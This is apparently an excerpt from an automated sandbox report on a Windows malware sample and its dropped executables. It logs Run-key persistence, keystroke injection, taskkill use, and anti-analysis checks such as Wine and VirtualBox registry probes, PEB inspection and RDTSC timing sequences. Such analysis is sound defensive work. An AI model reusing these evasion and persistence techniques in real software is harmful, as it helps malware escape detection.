Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e2def46cb9.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FEF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		9_2_00FEF98E
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01061C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		9_2_01061C41

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_9-95687

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-11396
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_1-9716

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A394A second address: 10A3952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B619A second address: 10B61B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A37h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B61B5 second address: 10B61D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FF248D53496h 0x0000000f jnl 00007FF248D53496h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B61D2 second address: 10B61D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B61D8 second address: 10B61DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B64F6 second address: 10B64FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B64FC second address: 10B651D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 ja 00007FF248D534A4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B651D second address: 10B6523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B666D second address: 10B6674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6674 second address: 10B667E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF249520A2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B667E second address: 10B66CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF248D534A7h 0x0000000c jmp 00007FF248D534A8h 0x00000011 pushad 0x00000012 jmp 00007FF248D534A3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B66CA second address: 10B66E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF249520A26h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FF249520A26h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6991 second address: 10B699B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF248D53496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B699B second address: 10B69A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B69A0 second address: 10B69AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jc 00007FF248D5349Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B836D second address: 10B837B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF249520A26h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B837B second address: 10B8386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B8386 second address: 10B83DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF249520A26h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 jmp 00007FF249520A38h 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 jnl 00007FF249520A2Ch 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FF249520A31h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B85BC second address: 10B85D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF248D534A1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B85D6 second address: 10B8648 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF249520A2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cl, 07h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FF249520A28h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 push 8D1691C3h 0x0000002e jng 00007FF249520A32h 0x00000034 jne 00007FF249520A2Ch 0x0000003a add dword ptr [esp], 72E96EBDh 0x00000041 mov edx, dword ptr [ebp+122D3AC6h] 0x00000047 push 00000003h 0x00000049 cmc 0x0000004a push 00000000h 0x0000004c movzx esi, cx 0x0000004f push 00000003h 0x00000051 push 8B8D3580h 0x00000056 push eax 0x00000057 push edx 0x00000058 push ecx 0x00000059 push edi 0x0000005a pop edi 0x0000005b pop ecx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B8752 second address: 10B8756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB0F5 second address: 10CB0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB0F9 second address: 10CB11A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB11A second address: 10CB120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D8989 second address: 10D898F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D6846 second address: 10D685B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D685B second address: 10D6860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D720A second address: 10D7222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF249520A32h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D73AD second address: 10D73BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF248D5349Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D73BC second address: 10D73CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnl 00007FF249520A28h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D73CF second address: 10D73FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF248D534A9h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007FF248D5349Dh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D73FF second address: 10D7407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D76DF second address: 10D76E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D788A second address: 10D7890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7890 second address: 10D78B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A4h 0x00000007 jmp 00007FF248D534A1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D78B9 second address: 10D78BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D78BE second address: 10D78C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D78C4 second address: 10D78EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jmp 00007FF249520A38h 0x0000000d jo 00007FF249520A2Eh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC8B7 second address: 10DC8CD instructions: 0x00000000 rdtsc 0x00000002 je 00007FF248D5349Ch 0x00000008 jc 00007FF248D53496h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC8CD second address: 10DC8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC8D1 second address: 10DC8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DCE51 second address: 10DCE67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DCF63 second address: 10DCFA6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF248D53498h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FF248D534A7h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jnl 00007FF248D534B8h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF248D534A2h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DF897 second address: 10DF89E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E45DE second address: 10E45E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E475C second address: 10E4772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FF249520A2Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E48C1 second address: 10E48D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF248D53496h 0x0000000a jl 00007FF248D5349Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E48D3 second address: 10E48DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E576F second address: 10E579A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b js 00007FF248D534B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF248D534A8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E58C1 second address: 10E58E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E5D10 second address: 10E5D1A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E63D9 second address: 10E63DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E63DD second address: 10E63E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E6462 second address: 10E6468 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E6468 second address: 10E646E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E646E second address: 10E6472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E6A88 second address: 10E6A92 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF248D53496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8FE6 second address: 10E8FF0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF249520A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB389 second address: 10EB38F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EDF97 second address: 10EDFED instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF249520A2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D1DD8h], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FF249520A28h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jbe 00007FF249520A2Ah 0x00000033 mov si, 3B94h 0x00000037 mov di, bx 0x0000003a push 00000000h 0x0000003c movsx edi, ax 0x0000003f xchg eax, ebx 0x00000040 jp 00007FF249520A34h 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EDFED second address: 10EDFF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EDCEF second address: 10EDCF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EE864 second address: 10EE877 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF248D53498h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1C1A second address: 10F1C20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EE877 second address: 10EE881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FF248D53496h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3240 second address: 10F3279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnl 00007FF249520A36h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF249520A39h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3279 second address: 10F328B instructions: 0x00000000 rdtsc 0x00000002 js 00007FF248D53496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FF248D5349Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3452 second address: 10F3456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
